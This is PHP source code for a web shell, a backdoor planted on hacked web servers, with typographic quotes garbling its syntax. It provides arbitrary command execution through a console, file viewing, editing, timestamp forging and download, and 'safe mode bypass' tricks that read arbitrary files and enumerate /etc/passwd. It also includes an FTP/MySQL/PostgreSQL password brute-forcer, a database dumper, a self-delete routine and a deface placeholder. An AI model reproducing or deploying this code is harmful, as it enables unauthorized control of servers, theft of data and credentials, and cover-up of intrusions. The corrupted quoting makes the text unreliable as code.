if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) if (($f != « . ») and ($f != « .. »)) {
copy_paste($c . $s . ‘/’, $f, $d . $s . ‘/’);
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION[‘f’] as $f) @rename($_SESSION[‘cwd’] . $f, $GLOBALS[‘cwd’] . $f);
}
unset($_SESSION[‘f’]);
break;
default:
if (!empty($_POST[‘p1’]) && (($_POST[‘p1’] == ‘copy’) || ($_POST[‘p1’] == ‘move’))) {
$_SESSION[‘act’] = @$_POST[‘p1’];
$_SESSION[‘f’] = @$_POST[‘f’];
foreach ($_SESSION[‘f’] as $k => $f) $_SESSION[‘f’][$k] = urldecode($f);
$_SESSION[‘cwd’] = @$_POST[‘c’];
}
break;
}
echo ‘<script>document.mf.p1.value= » »;document.mf.p2.value= » »;</script>’;
}
$dirContent = @scandir(isset($_POST[‘c’]) ? $_POST[‘c’] : $GLOBALS[‘cwd’]);
if ($dirContent === false) {
echo ‘Can\’t open this folder!’;
return;
}
global $sort;
$sort = array(‘name’, 1);
if (!empty($_POST[‘p1’])) {
if (preg_match(‘!s_([A-z]+)_(\d{1})!’, $_POST[‘p1’], $match)) $sort = array($match[1], (int)$match[2]);
}
echo ‘<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == \’checkbox\’)
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width=\’100%\’ class=\’main\’ cellspacing=\’0\’ cellpadding=\’2\’>
<form name=files method=post>’;
echo « <tr><th width=’13px’><input type=checkbox onclick=’sa()’ class=chkbx></th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_name_ » . ($sort[1] ? 0 : 1) . « \ »)’>Name</a></th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_size_ » . ($sort[1] ? 0 : 1) . « \ »)’>Size</a></th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_modify_ » . ($sort[1] ? 0 : 1) . « \ »)’>Modify</a></th><th>Owner/Group</th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_perms_ » . ($sort[1] ? 0 : 1) . « \ »)’>Permissions</a></th><th>Actions</th></tr> »;
$dirs = $files = $links = array();
$n = count($dirContent);
for ($i = 0;$i < $n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array(‘name’ => $dirContent[$i], ‘path’ => $GLOBALS[‘cwd’] . $dirContent[$i], ‘modify’ => @date(‘Y-m-d H:i:s’, @filemtime($GLOBALS[‘cwd’] . $dirContent[$i])), ‘perms’ => viewPermsColor($GLOBALS[‘cwd’] . $dirContent[$i]), ‘size’ => @filesize($GLOBALS[‘cwd’] . $dirContent[$i]), ‘owner’ => $ow[‘name’] ? $ow[‘name’] : @fileowner($dirContent[$i]), ‘group’ => $gr[‘name’] ? $gr[‘name’] : @filegroup($dirContent[$i]));
if (@is_file($GLOBALS[‘cwd’] . $dirContent[$i])) $files[] = array_merge($tmp, array(‘type’ => ‘file’));
elseif (@is_link($GLOBALS[‘cwd’] . $dirContent[$i])) $links[] = array_merge($tmp, array(‘type’ => ‘link’));
elseif (@is_dir($GLOBALS[‘cwd’] . $dirContent[$i]) && ($dirContent[$i] != « . »)) $dirs[] = array_merge($tmp, array(‘type’ => ‘dir’));
}
$GLOBALS[‘sort’] = $sort;
function cmp($a, $b) {
if ($GLOBALS[‘sort’][0] != ‘size’) return strcmp($a[$GLOBALS[‘sort’][0]], $b[$GLOBALS[‘sort’][0]]) * ($GLOBALS[‘sort’][1] ? 1 : -1);
else return (($a[‘size’] < $b[‘size’]) ? -1 : 1) * ($GLOBALS[‘sort’][1] ? 1 : -1);
}
usort($files, « cmp »);
usort($dirs, « cmp »);
usort($links, « cmp »);
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach ($files as $f) {
echo ‘<tr’ . ($l ? ‘ class=l1’ : ») . ‘><td><input type=checkbox name= »f[] » value= »‘ . urlencode($f[‘name’]) . ‘ » class=chkbx></td><td><a href=# onclick= »‘ . (($f[‘type’] == ‘file’) ? ‘g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’view\’) »>’ . htmlspecialchars($f[‘name’]) : ‘g(\’FilesMan\’,\ » . $f[‘path’] . ‘\’); »><b>[ ‘ . htmlspecialchars($f[‘name’]) . ‘ ]</b>’) . ‘</a></td><td>’ . (($f[‘type’] == ‘file’) ? viewSize($f[‘size’]) : $f[‘type’]) . ‘</td><td>’ . $f[‘modify’] . ‘</td><td>’ . $f[‘owner’] . ‘/’ . $f[‘group’] . ‘</td><td><a href=# onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’,\’chmod\’) »>’ . $f[‘perms’] . ‘</td><td><a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’rename\’) »>R</a> <a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’touch\’) »>T</a>’ . (($f[‘type’] == ‘file’) ? ‘ <a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’edit\’) »>E</a> <a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’download\’) »>D</a>’ : ») . ‘</td></tr>’;
$l = $l ? 0 : 1;
}
echo ‘<tr><td colspan=5>
<input type=hidden name=a value=\’FilesMan\’>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
<select name=\’p1\’><option value=\’copy\’>Copy</option><option value=\’move\’>Move</option><option value=\’delete\’>Delete</option>’;
if (!empty($_SESSION[‘act’]) && @count($_SESSION[‘f’])) {
echo ‘<option value=\’paste\’>Paste</option>’;
}
echo ‘</select> <input type= »submit » value= »>> »></td><td colspan= »2″ align= »right » width= »1″><input name= »def » value= »Comming Soon!!! » disabled= »disabled »/> <input type= »submit » value= »Add Deface Here » disabled= »disabled »></td></tr>
</form></table></div>’;
printFooter();
}
function actionStringTools() {
if (!function_exists(‘hex2bin’)) {
function hex2bin($p) {
return decbin(hexdec($p));
}
}
if (!function_exists(‘hex2ascii’)) {
function hex2ascii($p) {
$r = »;
for ($i = 0;$i < strLen($p);$i+= 2) {
$r.= chr(hexdec($p[$i] . $p[$i + 1]));
}
return $r;
}
}
if (!function_exists(‘ascii2hex’)) {
function ascii2hex($p) {
$r = »;
for ($i = 0;$i < strlen($p);++$i) $r.= dechex(ord($p[$i]));
return strtoupper($r);
}
}
if (!function_exists(‘full_urlencode’)) {
function full_urlencode($p) {
$r = »;
for ($i = 0;$i < strlen($p);++$i) $r.= ‘%’ . dechex(ord($p[$i]));
return strtoupper($r);
}
}
if (isset($_POST[‘ajax’])) {
$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = true;
ob_start();
if (function_exists($_POST[‘p1’])) echo $_POST[‘p1’]($_POST[‘p2’]);
$temp = « document.getElementById(‘strOutput’).style.display= »;document.getElementById(‘strOutput’).innerHTML=' » . addcslashes(htmlspecialchars(ob_get_clean()), »
\' ») . « ‘;
« ;
echo strlen($temp), »
« , $temp;
exit;
}
printHeader();
echo ‘<h1>String conversions</h1><div class=content>’;
$stringTools = array(‘Base64 encode’ => ‘base64_encode’, ‘Base64 decode’ => ‘base64_decode’, ‘Url encode’ => ‘urlencode’, ‘Url decode’ => ‘urldecode’, ‘Full urlencode’ => ‘full_urlencode’, ‘md5 hash’ => ‘md5’, ‘sha1 hash’ => ‘sha1’, ‘crypt’ => ‘crypt’, ‘CRC32’ => ‘crc32’, ‘ASCII to HEX’ => ‘ascii2hex’, ‘HEX to ASCII’ => ‘hex2ascii’, ‘HEX to DEC’ => ‘hexdec’, ‘HEX to BIN’ => ‘hex2bin’, ‘DEC to HEX’ => ‘dechex’, ‘DEC to BIN’ => ‘decbin’, ‘BIN to HEX’ => ‘bin2hex’, ‘BIN to DEC’ => ‘bindec’, ‘String to lower case’ => ‘strtolower’, ‘String to upper case’ => ‘strtoupper’, ‘Htmlspecialchars’ => ‘htmlspecialchars’, ‘String length’ => ‘strlen’,);
if (empty($_POST[‘ajax’]) && !empty($_POST[‘p1’])) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = false;
echo « <form name=’toolsForm’ onSubmit=’if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;’><select name=’selectTool’> »;
foreach ($stringTools as $k => $v) echo « <option value=' » . htmlspecialchars($v) . « ‘> » . $k . « </option> »;
echo « </select><input type=’submit’ value=’>>’/> <input type=checkbox name=ajax value=1 » . ($_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] ? ‘checked’ : ») . « > send using AJAX<br><textarea name=’input’ style=’margin-top:5px’ class=bigarea> » . htmlspecialchars(@$_POST[‘p2′]) . « </textarea></form><pre class=’ml1’ style=' » . (empty($_POST[‘p1’]) ? ‘display:none;’ : ») . « margin-top:5px’ id=’strOutput’> »;
if (!empty($_POST[‘p1’])) {
if (function_exists($_POST[‘p1’])) echo htmlspecialchars($_POST[‘p1’]($_POST[‘p2’]));
}
echo « </pre></div> »;
printFooter();
}
function actionFilesTools() {
if (isset($_POST[‘p1’])) $_POST[‘p1’] = urldecode($_POST[‘p1’]);
if (@$_POST[‘p2’] == ‘download’) {
if (is_file($_POST[‘p1’]) && is_readable($_POST[‘p1’])) {
ob_start(« ob_gzhandler », 4096);
header(« Content-Disposition: attachment; filename= » . basename($_POST[‘p1’]));
if (function_exists(« mime_content_type »)) {
$type = @mime_content_type($_POST[‘p1’]);
header(« Content-Type: » . $type);
}
$fp = @fopen($_POST[‘p1’], « r »);
if ($fp) {
while (!@feof($fp)) echo @fread($fp, 1024);
fclose($fp);
}
} elseif (is_dir($_POST[‘p1’]) && is_readable($_POST[‘p1’])) {
}
exit;
}
if (@$_POST[‘p2’] == ‘mkfile’) {
if (!file_exists($_POST[‘p1’])) {
$fp = @fopen($_POST[‘p1’], ‘w’);
if ($fp) {
$_POST[‘p2’] = « edit »;
fclose($fp);
}
}
}
printHeader();
echo ‘<h1>File tools</h1><div class=content>’;
if (!file_exists(@$_POST[‘p1’])) {
echo ‘File not exists’;
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST[‘p1’]));
$gid = @posix_getgrgid(@fileowner($_POST[‘p1’]));
echo ‘<span>Name:</span> ‘ . htmlspecialchars($_POST[‘p1’]) . ‘ <span>Size:</span> ‘ . (is_file($_POST[‘p1’]) ? viewSize(filesize($_POST[‘p1’])) : ‘-‘) . ‘ <span>Permission:</span> ‘ . viewPermsColor($_POST[‘p1’]) . ‘ <span>Owner/Group:</span> ‘ . $uid[‘name’] . ‘/’ . $gid[‘name’] . ‘<br>’;
echo ‘<span>Create time:</span> ‘ . date(‘Y-m-d H:i:s’, filectime($_POST[‘p1’])) . ‘ <span>Access time:</span> ‘ . date(‘Y-m-d H:i:s’, fileatime($_POST[‘p1’])) . ‘ <span>Modify time:</span> ‘ . date(‘Y-m-d H:i:s’, filemtime($_POST[‘p1’])) . ‘<br><br>’;
if (empty($_POST[‘p2’])) $_POST[‘p2’] = ‘view’;
if (is_file($_POST[‘p1’])) $m = array(‘View’, ‘Highlight’, ‘Download’, ‘Hexdump’, ‘Edit’, ‘Chmod’, ‘Rename’, ‘Touch’);
else $m = array(‘Chmod’, ‘Rename’, ‘Touch’);
foreach ($m as $v) echo ‘<a href=# onclick= »g(null,null,null,\ » . strtolower($v) . ‘\’) »>’ . ((strtolower($v) == @$_POST[‘p2’]) ? ‘<b>[ ‘ . $v . ‘ ]</b>’ : $v) . ‘</a> ‘;
echo ‘<br><br>’;
switch ($_POST[‘p2’]) {
case ‘view’:
echo ‘<pre class=ml1>’;
$fp = @fopen($_POST[‘p1’], ‘r’);
if ($fp) {
while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo ‘</pre>’;
break;
case ‘highlight’:
if (is_readable($_POST[‘p1’])) {
echo ‘<div class=ml1 style= »background-color: #e1e1e1;color:black; »>’;
$code = highlight_file($_POST[‘p1’], true);
echo str_replace(array(‘<span ‘, ‘</span>’), array(‘<font ‘, ‘</font>’), $code) . ‘</div>’;
}
break;
case ‘chmod’:
if (!empty($_POST[‘p3’])) {
$perms = 0;
for ($i = strlen($_POST[‘p3’]) – 1;$i >= 0;–$i) $perms+= (int)$_POST[‘p3’][$i] * pow(8, (strlen($_POST[‘p3’]) – $i – 1));
if (!@chmod($_POST[‘p1’], $perms)) echo ‘Can\’t set permissions!<br><script>document.mf.p3.value= » »;</script>’;
else die(‘<script>g(null,null,null,null, » »)</script>’);
}
echo ‘<form onsubmit= »g(null,null,null,null,this.chmod.value);return false; »><input type=text name=chmod value= »‘ . substr(sprintf(‘%o’, fileperms($_POST[‘p1’])), -4) . ‘ »><input type=submit value= »>> »></form>’;
break;
case ‘edit’:
if (!is_writable($_POST[‘p1’])) {
echo ‘File isn\’t writeable’;
break;
}
if (!empty($_POST[‘p3’])) {
@file_put_contents($_POST[‘p1’], $_POST[‘p3’]);
echo ‘Saved!<br><script>document.mf.p3.value= » »;</script>’;
}
echo ‘<form onsubmit= »g(null,null,null,null,this.text.value);return false; »><textarea name=text class=bigarea>’;
$fp = @fopen($_POST[‘p1’], ‘r’);
if ($fp) {
while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo ‘</textarea><input type=submit value= »>> »></form>’;
break;
case ‘hexdump’:
$c = @file_get_contents($_POST[‘p1’]);
$n = 0;
$h = array(‘00000000<br>’, », »);
$len = strlen($c);
for ($i = 0;$i < $len;++$i) {
$h[1].= sprintf(‘%02X’, ord($c[$i])) . ‘ ‘;
switch (ord($c[$i])) {
case 0:
$h[2].= ‘ ‘;
break;
case 9:
$h[2].= ‘ ‘;
break;
case 10:
$h[2].= ‘ ‘;
break;
case 13:
$h[2].= ‘ ‘;
break;
default:
$h[2].= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0].= sprintf(‘%08X’, $i + 1) . ‘<br>’;
}
$h[1].= ‘<br>’;
$h[2].= »
« ;
}
}
echo ‘<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style= »font-weight: normal; »><pre>’ . $h[0] . ‘</pre></span></td><td bgcolor=#282828><pre>’ . $h[1] . ‘</pre></td><td bgcolor=#333333><pre>’ . htmlspecialchars($h[2]) . ‘</pre></td></tr></table>’;
break;
case ‘rename’:
if (!empty($_POST[‘p3’])) {
if (!@rename($_POST[‘p1’], $_POST[‘p3’])) echo ‘Can\’t rename!<br><script>document.mf.p3.value= » »;</script>’;
else die(‘<script>g(null,null, »‘ . urlencode($_POST[‘p3’]) . ‘ »,null, » »)</script>’);
}
echo ‘<form onsubmit= »g(null,null,null,null,this.name.value);return false; »><input type=text name=name value= »‘ . htmlspecialchars($_POST[‘p1’]) . ‘ »><input type=submit value= »>> »></form>’;
break;
case ‘touch’:
if (!empty($_POST[‘p3’])) {
$time = strtotime($_POST[‘p3’]);
if ($time) {
if (@touch($_POST[‘p1’], $time, $time)) die(‘<script>g(null,null,null,null, » »)</script>’);
else {
echo ‘Fail!<script>document.mf.p3.value= » »;</script>’;
}
} else echo ‘Bad time format!<script>document.mf.p3.value= » »;</script>’;
}
echo ‘<form onsubmit= »g(null,null,null,null,this.touch.value);return false; »><input type=text name=touch value= »‘ . date(« Y-m-d H:i:s », @filemtime($_POST[‘p1’])) . ‘ »><input type=submit value= »>> »></form>’;
break;
case ‘mkfile’:
break;
}
echo ‘</div>’;
printFooter();
}
function actionSafeMode() {
$temp = »;
ob_start();
switch ($_POST[‘p1’]) {
case 1:
$temp = @tempnam($test, ‘cx’);
if (@copy(« compress.zlib:// » . $_POST[‘p2’], $temp)) {
echo @file_get_contents($temp);
unlink($temp);
} else echo ‘Sorry… Can\’t open file’;
break;
case 2:
$files = glob($_POST[‘p2’] . ‘*’);
if (is_array($files)) foreach ($files as $filename) echo $filename . »
« ;
break;
case 3:
$ch = curl_init(« file:// » . $_POST[‘p2’] . « » . SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore(« safe_mode »);
ini_restore(« open_basedir »);
include ($_POST[‘p2’]);
break;
case 5:
for (;$_POST[‘p2’] <= $_POST[‘p3’];$_POST[‘p2’]++) {
$uid = @posix_getpwuid($_POST[‘p2’]);
if ($uid) echo join(‘:’, $uid) . »
« ;
}
break;
case 6:
if (!function_exists(‘imap_open’)) break;
$stream = imap_open($_POST[‘p2’], « », « »);
if ($stream == FALSE) break;
echo imap_body($stream, 1);
imap_close($stream);
break;
}
$temp = ob_get_clean();
printHeader();
echo ‘<h1>Safe mode bypass</h1><div class=content>’;
echo ‘<span>Copy (read file)</span><form onsubmit=\’g(null,null, »1″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Glob (list dir)</span><form onsubmit=\’g(null,null, »2″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Curl (read file)</span><form onsubmit=\’g(null,null, »3″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Ini_restore (read file)</span><form onsubmit=\’g(null,null, »4″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Posix_getpwuid (« Read » /etc/passwd)</span><table><form onsubmit=\’g(null,null, »5″,this.param1.value,this.param2.value);return false;\’><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value= »>> »></form><br><br><span>Imap_open (read file)</span><form onsubmit=\’g(null,null, »6″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form>’;
if ($temp) echo ‘<pre class= »ml1″ style= »margin-top:5px » id= »Output »>’ . $temp . ‘</pre>’;
echo ‘</div>’;
printFooter();
}
function actionConsole() {
if (isset($_POST[‘ajax’])) {
$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = true;
ob_start();
echo « document.cf.cmd.value= »;
« ;
$temp = @iconv($_POST[‘charset’], ‘UTF-8’, addcslashes( »
$ » . $_POST[‘p1’] . »
» . ex($_POST[‘p1’]), »
\' »));
if (preg_match(« !.*cd\s+([^;]+)$! », $_POST[‘p1’], $match)) {
if (@chdir($match[1])) {
$GLOBALS[‘cwd’] = @getcwd();
echo « document.mf.c.value=' » . $GLOBALS[‘cwd’] . « ‘; »;
}
}
echo « document.cf.output.value+=' » . $temp . « ‘; »;
echo « document.cf.output.scrollTop = document.cf.output.scrollHeight; »;
$temp = ob_get_clean();
echo strlen($temp), »
« , $temp;
exit;
}
printHeader();
echo ‘<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array(« »);
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur–;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur–;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push(« »);
cur = cmds.length-1;
}
</script>’;
echo ‘<h1>Console</h1><div class=content><form name=cf onsubmit= »if(document.cf.cmd.value==\’clear\’){document.cf.output.value=\’\’;document.cf.cmd.value=\’\’;return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false; »><select name=alias>’;
foreach ($GLOBALS[‘aliases’] as $n => $v) {
if ($v == ») {
echo ‘<optgroup label= »-‘ . htmlspecialchars($n) . ‘-« ></optgroup>’;
continue;
}
echo ‘<option value= »‘ . htmlspecialchars($v) . ‘ »>’ . $n . ‘</option>’;
}
if (empty($_POST[‘ajax’]) && !empty($_POST[‘p1’])) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = false;
echo ‘</select><input type=button onclick= »add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);} » value= »>> »> <input type=checkbox name=ajax value=1 ‘ . ($_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] ? ‘checked’ : ») . ‘> send using AJAX<br/><textarea class=bigarea name=output style= »border-bottom:0; » readonly>’;
if (!empty($_POST[‘p1’])) {
echo htmlspecialchars(« $ » . $_POST[‘p1’] . »
» . ex($_POST[‘p1’]));
}
echo ‘</textarea><input type=text name=cmd style= »border-top:0;width:100%; » onkeydown= »kp(event); »>’;
echo ‘</form></div><script>document.cf.cmd.focus();</script>’;
printFooter();
}
function actionLogout() {
unset($_SESSION[md5($_SERVER[‘HTTP_HOST’]) ]);
echo ‘<body bgcolor=#000000><center><img src= »http://www.itechcode.com/wp-content/uploads/2012/04/Secret-of-Blogging-Successfully.jpg »></center></body>’;
}
function actionSelfRemove() {
printHeader();
if ($_POST[‘p1’] == ‘yes’) {
if (@unlink(SELF_PATH)) die(‘Shell has been removed’);
else echo ‘unlink error!’;
}
echo ‘<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick= »g(null,null,\’yes\’) »>Yes</a></div>’;
printFooter();
}
function actionBruteforce() {
printHeader();
if (isset($_POST[‘proto’])) {
echo ‘<h1>Results</h1><div class=content><span>Type:</span> ‘ . htmlspecialchars($_POST[‘proto’]) . ‘ <span>Server:</span> ‘ . htmlspecialchars($_POST[‘server’]) . ‘<br>’;
if ($_POST[‘proto’] == ‘ftp’) {
function bruteForce($ip, $port, $login, $pass) {
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST[‘proto’] == ‘mysql’) {
function bruteForce($ip, $port, $login, $pass) {
$res = @mysql_connect($ip . ‘:’ . $port ? $port : 3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST[‘proto’] == ‘pgsql’) {
function bruteForce($ip, $port, $login, $pass) {
$str = « host=' » . $ip . « ‘ port=' » . $port . « ‘ user=' » . $login . « ‘ password=' » . $pass . « ‘ dbname= » »;
$res = @pg_connect($server[0] . ‘:’ . $server[1] ? $server[1] : 5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(« : », $_POST[‘server’]);
if ($_POST[‘type’] == 1) {
$temp = @file(‘/etc/passwd’);
if (is_array($temp)) foreach ($temp as $line) {
$line = explode(« : », $line);
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo ‘<b>’ . htmlspecialchars($line[0]) . ‘</b>:’ . htmlspecialchars($line[0]) . ‘<br>’;
}
if (@$_POST[‘reverse’]) {
$tmp = « »;
for ($i = strlen($line[0]) – 1;$i >= 0;–$i) $tmp.= $line[0][$i];
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo ‘<b>’ . htmlspecialchars($line[0]) . ‘</b>:’ . htmlspecialchars($tmp);
}
}
}
} elseif ($_POST[‘type’] == 2) {
$temp = @file($_POST[‘dict’]);
if (is_array($temp)) foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (bruteForce($server[0], @$server[1], $_POST[‘login’], $line)) {
$success++;
echo ‘<b>’ . htmlspecialchars($_POST[‘login’]) . ‘</b>:’ . htmlspecialchars($line) . ‘<br>’;
}
}
}
echo « <span>Attempts:</span> $attempts <span>Success:</span> $success</div><br> »;
}
echo ‘<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>’ . ‘<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>’ . ‘<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>’ . ‘<input type=hidden name=a value= »‘ . htmlspecialchars($_POST[‘a’]) . ‘ »>’ . ‘<input type=hidden name=charset value= »‘ . htmlspecialchars($_POST[‘charset’]) . ‘ »>’ . ‘<span>Server:port</span></td>’ . ‘<td><input type=text name=server value= »127.0.0.1″></td></tr>’ . ‘<tr><td><span>Brute type</span></td>’ . ‘<td><label><input type=radio name=type value= »1″ checked> /etc/passwd</label></td></tr>’ . ‘<tr><td></td><td><label style= »padding-left:15px »><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>’ . ‘<tr><td></td><td><label><input type=radio name=type value= »2″> Dictionary</label></td></tr>’ . ‘<tr><td></td><td><table style= »padding-left:15px »><tr><td><span>Login</span></td>’ . ‘<td><input type=text name=login value= »root »></td></tr>’ . ‘<tr><td><span>Dictionary</span></td>’ . ‘<td><input type=text name=dict value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘passwd.dic »></td></tr></table>’ . ‘</td></tr><tr><td></td><td><input type=submit value= »>> »></td></tr></form></table>’;
echo ‘</div><br>’;
printFooter();
}
function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname) {
switch ($this->type) {
case ‘mysql’:
if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
break;
case ‘pgsql’:
$host = explode(‘:’, $host);
if (!$host[1]) $host[1] = 5432;
if ($this->link = @pg_connect(« host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname »)) return true;
break;
}
return false;
}
function selectdb($db) {
switch ($this->type) {
case ‘mysql’:
if (@mysql_select_db($db)) return true;
break;
}
return false;
}
function query($str) {
switch ($this->type) {
case ‘mysql’:
return $this->res = @mysql_query($str);
break;
case ‘pgsql’:
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch() {
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case ‘mysql’:
return @mysql_fetch_assoc($res);
break;
case ‘pgsql’:
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch ($this->type) {
case ‘mysql’:
return $this->res = @mysql_list_dbs($this->link);
break;
case ‘pgsql’:
return $this->res = $this->query(« SELECT datname FROM pg_database »);
break;
}
return false;
}
function listTables() {
switch ($this->type) {
case ‘mysql’:
return $this->res = $this->query(‘SHOW TABLES’);
break;
case ‘pgsql’:
return $this->res = $this->query(« select table_name from information_schema.tables where (table_schema != ‘information_schema’ AND table_schema != ‘pg_catalog’) or table_name = ‘pg_user' »);
break;
}
return false;
}
function error() {
switch ($this->type) {
case ‘mysql’:
return @mysql_error($this->link);
break;
case ‘pgsql’:
return @pg_last_error($this->link);
break;
}
return false;
}
function setCharset($str) {
switch ($this->type) {
case ‘mysql’:
if (function_exists(‘mysql_set_charset’)) return @mysql_set_charset($str, $this->link);
else $this->query(‘SET CHARSET ‘ . $str);
break;
case ‘mysql’:
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function dump($table) {
switch ($this->type) {
case ‘mysql’:
$res = $this->query(‘SHOW CREATE TABLE `’ . $table . ‘`’);
$create = mysql_fetch_array($res);
echo $create[1] . « ;
« ;
$this->query(‘SELECT * FROM `’ . $table . ‘`’);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = « ‘ » . @mysql_real_escape_string($v) . « ‘ »;
$columns[] = « ` » . $k . « ` »;
}
echo ‘INSERT INTO `’ . $table . ‘` (‘ . implode(« , « , $columns) . ‘) VALUES (‘ . implode(« , « , $item) . ‘);’ . »
« ;
}
break;
case ‘pgsql’:
$this->query(‘SELECT * FROM ‘ . $table);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = « ‘ » . addslashes($v) . « ‘ »;
$columns[] = $k;
}
echo ‘INSERT INTO ‘ . $table . ‘ (‘ . implode(« , « , $columns) . ‘) VALUES (‘ . implode(« , « , $item) . ‘);’ . »
« ;
}
break;
}
return false;
}
};
$db = new DbClass(@$_POST[‘type’]);
if (@$_POST[‘p2’] == ‘download’) {
ob_start(« ob_gzhandler », 4096);
$db->connect($_POST[‘sql_host’], $_POST[‘sql_login’], $_POST[‘sql_pass’], $_POST[‘sql_base’]);
$db->selectdb($_POST[‘sql_base’]);
header(« Content-Disposition: attachment; filename=dump.sql »);
header(« Content-Type: text/plain »);
foreach ($_POST[‘tbl’] as $v) $db->dump($v);
exit;
}
printHeader();
echo ‘<h1>Sql browser</h1><div class=content>
<form name= »sf » method= »post »>
<table cellpadding= »2″ cellspacing= »0″>
<tr>
<td>Type</td>
<td>Host</td>
<td>Login</td>
<td>Password</td>
<td>Database</td>
<td></td>
</tr>
<tr>
<input type=hidden name=a value=Sql>
<input type=hidden name=p1 value=\’query\’>
<input type=hidden name=p2>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
<td>
<select name=\’type\’>
<option value= »mysql » ‘ . (@$_POST[‘type’] == ‘mysql’ ? ‘selected’ : ») . ‘>MySql</option>
<option value= »pgsql » ‘ . (@$_POST[‘type’] == ‘pgsql’ ? ‘selected’ : ») . ‘>PostgreSql</option>
</select></td>
<td><input type=text name=sql_host value= »‘ . (empty($_POST[‘sql_host’]) ? ‘localhost’ : htmlspecialchars($_POST[‘sql_host’])) . ‘ »></td>
